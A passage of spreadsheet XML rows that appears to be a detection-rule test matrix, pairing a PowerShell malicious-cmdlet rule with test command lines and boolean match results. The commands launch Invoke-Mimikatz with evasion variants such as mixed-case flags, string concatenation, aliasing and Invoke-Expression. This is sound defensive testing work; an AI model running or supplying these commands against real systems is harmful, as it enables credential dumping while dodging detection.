      <c r="K2861" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2862" ht="15.75" customHeight="1" s="42">
      <c r="A2862" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2862" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2862" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2862" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2862" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnd "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F2862" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2862" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2862" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2862" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2862" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2862" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2863" ht="15.75" customHeight="1" s="42">
      <c r="A2863" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2863" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2863" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2863" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2863" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F2863" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2863" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2863" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2863" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2863" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2863" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2864" ht="15.75" customHeight="1" s="42">
      <c r="A2864" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2864" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2864" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2864" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2864" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMMand "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F2864" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2864" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2864" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2864" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2864" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2864" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2865" ht="15.75" customHeight="1" s="42">
      <c r="A2865" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2865" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2865" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2865" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2865" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAND "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F2865" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2865" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2865" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2865" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2865" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2865" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2866" ht="15.75" customHeight="1" s="42">
      <c r="A2866" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2866" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2866" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2866" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2866" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2866" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2866" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2866" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I286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66" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2866" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2867" ht="15.75" customHeight="1" s="42">
      <c r="A2867" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2867" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2867" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2867" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2867" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2867" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2867" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2867" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I286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67" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2867" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2868" ht="15.75" customHeight="1" s="42">
      <c r="A2868" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2868" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2868" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2868" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2868" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmanD "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2868" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2868" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2868" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I286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68" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2868" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2869" ht="15.75" customHeight="1" s="42">
      <c r="A2869" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2869" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2869" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2869" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2869" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmManD "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2869" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2869" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2869" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I28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69" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2869" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2870" ht="15.75" customHeight="1" s="42">
      <c r="A2870" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2870" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2870" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2870" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2870" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F2870" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2870" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2870" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2870" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2870" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2870" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2871" ht="15.75" customHeight="1" s="42">
      <c r="A2871" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2871" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2871" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2871" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2871" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F2871" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2871" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2871" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2871" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2871" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2871" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2872" ht="15.75" customHeight="1" s="42">
      <c r="A2872" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2872" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2872" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2872" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2872" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMand "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F2872" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2872" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2872" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2872" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2872" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2872" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2873" ht="15.75" customHeight="1" s="42">
      <c r="A2873" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2873" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2873" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2873" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2873" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmaNd "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F2873" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2873" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2873" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2873" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2873" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2873" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2874" ht="15.75" customHeight="1" s="42">
      <c r="A2874" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2874" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2874" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2874" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2874" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComManD "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F2874" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2874" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2874" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2874" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2874" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2874" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2875" ht="15.75" customHeight="1" s="42">
      <c r="A2875" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2875" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2875" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2875" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2875" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2875" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2875" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2875" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I287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75" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2875" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2876" ht="15.75" customHeight="1" s="42">
      <c r="A2876" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2876" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2876" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2876" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2876" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2876" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2876" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2876" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I287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76" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2876" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2877" ht="15.75" customHeight="1" s="42">
      <c r="A2877" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2877" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2877" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2877" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2877" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2877" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2877" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2877" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I287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77" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2877" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2878" ht="15.75" customHeight="1" s="42">
      <c r="A2878" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2878" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2878" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2878" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2878" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMAND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2878" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2878" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2878" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I287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78" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2878" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2879" ht="15.75" customHeight="1" s="42">
      <c r="A2879" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2879" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2879" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2879" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2879" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmANd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2879" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2879" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2879" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I287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79" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2879" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2880" ht="15.75" customHeight="1" s="42">
      <c r="A2880" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2880" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2880" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2880" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2880" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaNd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2880" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2880" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2880" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I288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0" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2880" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2881" ht="15.75" customHeight="1" s="42">
      <c r="A2881" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2881" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2881" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2881" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2881" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnD "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2881" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2881" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2881" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I288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1" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2881" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2882" ht="15.75" customHeight="1" s="42">
      <c r="A2882" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2882" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2882" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2882" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2882" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2882" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2882" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2882" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I288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2" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2882" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2883" ht="15.75" customHeight="1" s="42">
      <c r="A2883" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2883" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2883" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2883" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2883" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmAnd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2883" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2883" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2883" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I288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3" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2883" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2884" ht="15.75" customHeight="1" s="42">
      <c r="A2884" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2884" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2884" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2884" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2884" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmAnd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2884" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2884" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2884" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I288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4" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2884" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2885" ht="15.75" customHeight="1" s="42">
      <c r="A2885" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2885" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2885" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2885" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2885" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAnD "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2885" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2885" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2885" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I288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5" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2885" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2886" ht="15.75" customHeight="1" s="42">
      <c r="A2886" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2886" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2886" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2886" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2886" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMand "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2886" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2886" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2886" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I288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6" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2886" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2887" ht="15.75" customHeight="1" s="42">
      <c r="A2887" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2887" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2887" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2887" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2887" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2887" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2887" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2887" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I288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7" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2887" s="44" t="b">
        <v>0</v>
      </c>
